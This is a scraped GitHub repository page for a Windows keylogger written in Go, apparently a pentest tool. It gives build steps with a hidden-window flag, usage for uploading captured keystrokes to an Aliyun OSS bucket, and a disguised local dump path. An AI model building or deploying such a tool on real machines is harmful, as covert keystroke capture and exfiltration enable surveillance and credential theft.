keylogger
2022-10-24 02:9:24 Author: github.com(查看原文) 阅读量:39 收藏

A tag already exists with the provided branch name. Many Git commands accept both tag and branch names, so creating this branch may cause unexpected behavior. Are you sure you want to create this branch?

1 branch 0 tags

Code

This branch is up to date with uknowsec/keylogger:main.

Contribute
  • This branch is not ahead of the upstream uknowsec:main.

    No new commits yet. Enjoy your day!

Files

Permalink

Failed to load latest commit information.

Type

Name

Latest commit message

Commit time

Download Dependencies

go mod download # Use Proxy If you are in China!

If you are in China Mainland, please check: https://goproxy.cn/ for golang dependency download proxy setting guide.

Compile

go build -trimpath -ldflags "-s -w -H=windowsgui" key.go

Tested only on Windows.

Usage

Without any runtime params, it will never upload any recorded data.

To prevent Aliyun OSS Access Key from leakage, please use with caution.

> keylogger.exe -h

Usage of keylogger.exe:
  -o string
        format: bucketName:accessKeyId:accessKeySecret:endpoint
  -t int
        Upload interval,default: 60min (default 60)

Data

C:\Users\<USERNAME>\AppData\Local\Packages\Microsoft.Messaging\360se_dump.tmp

References

https://github.com/mabangde/pentesttools/blob/master/golang/keylogger.go


文章来源: https://github.com/y35uishere/keylogger
如有侵权请联系:admin#unsafe.sh